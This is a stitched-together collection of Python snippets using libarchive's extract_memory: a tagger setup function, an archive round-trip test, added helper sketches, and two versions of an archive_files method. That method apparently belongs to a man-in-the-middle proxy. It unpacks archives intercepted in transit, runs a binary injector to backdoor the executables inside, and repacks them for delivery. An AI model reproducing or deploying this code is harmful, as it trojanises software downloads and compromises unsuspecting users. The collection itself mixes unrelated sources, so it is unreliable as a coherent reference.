def prepare(): """Prepare tagger for run. This should be after installation to initialize tagger's resources. """ import nltk import requests from libarchive import extract_memory import os from shutil import move from f8a_tagger.utils import get_files_dir nltk.download("punkt") nltk.download("wordnet") maven_index_checker_url = 'https://github.com/fabric8-analytics/' \ 'maven-index-checker/files/1275145/' \ 'maven-index-checker-v0.1-alpha.zip' response = requests.get(maven_index_checker_url) if response.ok is not True: raise RemoteDependencyMissingError( "Failed to download maven-index-checker with " "response code %s", response.status_code) # Unfortunately no way how to know name or path of extracted file, # so assume it's maven-index-checker.jar jar_name = "maven-index-checker.jar" jar_path = get_files_dir() extract_memory(response.content) move(jar_name, os.path.join(jar_path, jar_name))
def test_buffers(tmpdir):
    # Collect information on what should be in the archive
    tree = treestat('libarchive')

    # Create an archive of our libarchive/ directory
    buf = bytes(bytearray(1000000))
    with libarchive.memory_writer(buf, 'gnutar', 'xz') as archive:
        archive.add_files('libarchive/')

    # Read the archive and check that the data is correct
    with libarchive.memory_reader(buf) as archive:
        check_archive(archive, tree)

    # Extract the archive in tmpdir and check that the data is intact
    with in_dir(tmpdir.strpath):
        flags = EXTRACT_OWNER | EXTRACT_PERM | EXTRACT_TIME
        libarchive.extract_memory(buf, flags)
        tree2 = treestat('libarchive')
        assert tree2 == tree
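# The snippets in this section rely on an in_dir() helper that is not shown here.
# Below is a minimal, hypothetical sketch of such a helper, assuming it is a simple
# "chdir and restore" context manager; the original projects may define it differently.
import os
from contextlib import contextmanager


@contextmanager
def in_dir(path):
    # Enter the given directory, then return to the previous working directory on exit.
    old_cwd = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(old_cwd)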
def archive_files(self, arch_file_bytes, arch_info, include_dirs=False):
    try:
        archive_type = ArchiveType(arch_info['type'])
    except Exception as ex:
        EnhancedOutput.print_error("Missing fields in the config file: {}".format(ex))
        EnhancedOutput.print_warning("Returning original file.")
        EnhancedOutput.logging_error("Error setting archive type: {}. Returning original file.".format(ex))
        return arch_file_bytes

    EnhancedOutput.print_size(arch_file_bytes)
    if len(arch_file_bytes) > archive_type.maxSize:
        EnhancedOutput.print_error("{} over allowed size".format(arch_info['type']))
        EnhancedOutput.logging_info("{} maxSize met {}".format(arch_info['type'], len(arch_file_bytes)))
        return arch_file_bytes

    tmp_dir = tempfile.mkdtemp()
    try:
        with in_dir(tmp_dir):
            flags = libarchive.extract.EXTRACT_OWNER | libarchive.extract.EXTRACT_PERM | libarchive.extract.EXTRACT_TIME
            libarchive.extract_memory(arch_file_bytes, flags)
    except Exception as exce:
        EnhancedOutput.print_error("Can't extract file. Returning original one.")
        EnhancedOutput.logging_error("Can't extract file: {}. Returning original one.".format(exce))
        return arch_file_bytes

    EnhancedOutput.print_info("{} file contents and info".format(arch_info['type']))
    EnhancedOutput.print_info("Compression: {}".format(arch_info['filter']))

    files_list = list()
    for dirname, dirnames, filenames in os.walk(tmp_dir):
        dirz = dirname.replace(tmp_dir, ".")
        print "\t{0}".format(dirz)
        if include_dirs:
            files_list.append(dirz)
        for f in filenames:
            fn = os.path.join(dirz, f)
            files_list.append(fn)
            print "\t{} {}".format(fn, os.lstat(os.path.join(dirname, f)).st_size)

    patch_count = 0
    patched = False
    tmp_archive = tempfile.NamedTemporaryFile()

    try:
        with libarchive.file_writer(tmp_archive.name, arch_info['format'], arch_info['filter']) as archive:
            for filename in files_list:
                full_path = os.path.join(tmp_dir, filename)
                EnhancedOutput.print_info(">>> Next file in archive: {}".format(filename))

                if os.path.islink(full_path) or not os.path.isfile(full_path):
                    EnhancedOutput.print_warning("{} is not a file, skipping.".format(filename))
                    with in_dir(tmp_dir):
                        archive.add_files(filename)
                    continue

                if os.lstat(full_path).st_size >= long(self.file_size_max):
                    EnhancedOutput.print_warning("{} is too big, skipping.".format(filename))
                    with in_dir(tmp_dir):
                        archive.add_files(filename)
                    continue

                # Check against keywords
                keyword_check = False
                if type(archive_type.blacklist) is str:
                    if archive_type.blacklist.lower() in filename.lower():
                        keyword_check = True
                else:
                    for keyword in archive_type.blacklist:
                        if keyword.lower() in filename.lower():
                            keyword_check = True
                            continue

                if keyword_check is True:
                    EnhancedOutput.print_warning("Archive blacklist enforced!")
                    EnhancedOutput.logging_info("Archive blacklist enforced on {}".format(filename))
                    continue

                if patch_count >= archive_type.patchCount:
                    with in_dir(tmp_dir):
                        archive.add_files(filename)
                    EnhancedOutput.logging_info("Met archive config patch count limit. Adding original file.")
                else:
                    # create the file on disk temporarily for binaryGrinder to run on it
                    tmp = tempfile.NamedTemporaryFile()
                    shutil.copyfile(full_path, tmp.name)
                    tmp.flush()

                    patch_result = self.binary_injector(tmp.name)
                    if patch_result:
                        patch_count += 1
                        file2 = os.path.join(self.staging_folder, os.path.basename(tmp.name))
                        EnhancedOutput.print_info("Patching complete, adding to archive file.")
                        # let's move the backdoored file to the final location
                        shutil.copyfile(file2, full_path)
                        EnhancedOutput.logging_info("{} in archive patched, adding to final archive".format(filename))
                        os.remove(file2)
                        patched = True
                    else:
                        EnhancedOutput.print_error("Patching failed")
                        EnhancedOutput.logging_error("{} patching failed. Keeping original file.".format(filename))

                    with in_dir(tmp_dir):
                        archive.add_files(filename)
                    tmp.close()
    except Exception as exc:
        EnhancedOutput.print_error("Error while creating the archive: {}. Returning the original file.".format(exc))
        EnhancedOutput.logging_error("Error while creating the archive: {}. Returning original file.".format(exc))
        shutil.rmtree(tmp_dir, ignore_errors=True)
        tmp_archive.close()
        return arch_file_bytes

    if patched is False:
        EnhancedOutput.print_info("No files were patched. Forwarding original file")
        shutil.rmtree(tmp_dir, ignore_errors=True)
        tmp_archive.close()
        return arch_file_bytes

    with open(tmp_archive.name, 'r+b') as f:
        ret = f.read()

    # cleanup
    shutil.rmtree(tmp_dir, ignore_errors=True)
    tmp_archive.close()

    EnhancedOutput.logging_info("Patching complete for HOST: {} ({}), PATH: {}".format(
        self.flow.request.host, self.host_domain, self.flow.request.path))

    return ret
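# The archive_files() snippets construct ArchiveType(arch_info['type']) and read its
# maxSize, patchCount and blacklist attributes, but the class itself is not shown.
# This is a hypothetical sketch of such a config wrapper; the real project presumably
# loads these values from its configuration file, and the names/values below are
# illustrative only.
ARCHIVE_CONFIG = {
    # example values only
    'ZIP': {'maxSize': 40000000, 'patchCount': 5, 'blacklist': ['.dll']},
}


class ArchiveType(object):
    def __init__(self, archive_type, config=ARCHIVE_CONFIG):
        settings = config[archive_type]  # a missing type raises, and the caller returns the original bytes
        self.maxSize = int(settings['maxSize'])
        self.patchCount = int(settings['patchCount'])
        self.blacklist = settings['blacklist']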
def archive_files(self, arch_file_bytes, arch_info, include_dirs=False):
    try:
        archive_type = ArchiveType(arch_info["type"])
    except Exception as ex:
        return arch_file_bytes

    if len(arch_file_bytes) > archive_type.maxSize:
        return arch_file_bytes

    tmp_dir = tempfile.mkdtemp()
    try:
        with in_dir(tmp_dir):
            flags = (
                libarchive.extract.EXTRACT_OWNER
                | libarchive.extract.EXTRACT_PERM
                | libarchive.extract.EXTRACT_TIME
            )
            libarchive.extract_memory(arch_file_bytes, flags)
    except Exception as exce:
        return arch_file_bytes

    files_list = list()
    for dirname, dirnames, filenames in os.walk(tmp_dir):
        dirz = dirname.replace(tmp_dir, ".")
        if include_dirs:
            files_list.append(dirz)
        for f in filenames:
            fn = os.path.join(dirz, f)
            files_list.append(fn)

    patch_count = 0
    patched = False
    tmp_archive = tempfile.NamedTemporaryFile()

    try:
        with libarchive.file_writer(tmp_archive.name, arch_info["format"], arch_info["filter"]) as archive:
            for filename in files_list:
                full_path = os.path.join(tmp_dir, filename)

                if os.path.islink(full_path) or not os.path.isfile(full_path):
                    with in_dir(tmp_dir):
                        archive.add_files(filename)
                    continue

                if os.lstat(full_path).st_size >= long(self.file_size_max):
                    with in_dir(tmp_dir):
                        archive.add_files(filename)
                    continue

                # Check against keywords
                keyword_check = False
                if type(archive_type.blacklist) is str:
                    if archive_type.blacklist.lower() in filename.lower():
                        keyword_check = True
                else:
                    for keyword in archive_type.blacklist:
                        if keyword.lower() in filename.lower():
                            keyword_check = True
                            continue

                if keyword_check is True:
                    continue

                if patch_count >= archive_type.patchCount:
                    with in_dir(tmp_dir):
                        archive.add_files(filename)
                else:
                    # create the file on disk temporarily for binaryGrinder to run on it
                    tmp = tempfile.NamedTemporaryFile()
                    shutil.copyfile(full_path, tmp.name)
                    tmp.flush()

                    with stdout_redirect(StringIO.StringIO()) as new_stdout:
                        patch_result = self.binary_injector(tmp.name)

                    if patch_result:
                        patch_count += 1
                        file2 = os.path.join(self.staging_folder, os.path.basename(tmp.name))
                        # let's move the backdoored file to the final location
                        shutil.copyfile(file2, full_path)
                        os.remove(file2)
                        patched = True
                        self.context.log("Patching {}: done".format(filename))
                    else:
                        self.context.log("Patching {}: failed".format(filename), level="error")

                    with in_dir(tmp_dir):
                        archive.add_files(filename)
                    tmp.close()
    except Exception as exc:
        shutil.rmtree(tmp_dir, ignore_errors=True)
        tmp_archive.close()
        return arch_file_bytes

    if patched is False:
        shutil.rmtree(tmp_dir, ignore_errors=True)
        tmp_archive.close()
        return arch_file_bytes

    with open(tmp_archive.name, "r+b") as f:
        ret = f.read()

    # cleanup
    shutil.rmtree(tmp_dir, ignore_errors=True)
    tmp_archive.close()
    return ret
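# The variant above silences the injector's output with a stdout_redirect() helper that
# is not shown. A minimal sketch of such a helper is below, assuming it simply swaps
# sys.stdout for the given stream (it is hypothetical; the original project may implement
# it differently). It works with the StringIO.StringIO buffer used in the Python 2 snippet.
import sys
from contextlib import contextmanager


@contextmanager
def stdout_redirect(stream):
    # Route sys.stdout into the given stream, restoring the original stdout on exit.
    old_stdout = sys.stdout
    sys.stdout = stream
    try:
        yield stream
    finally:
        sys.stdout = old_stdout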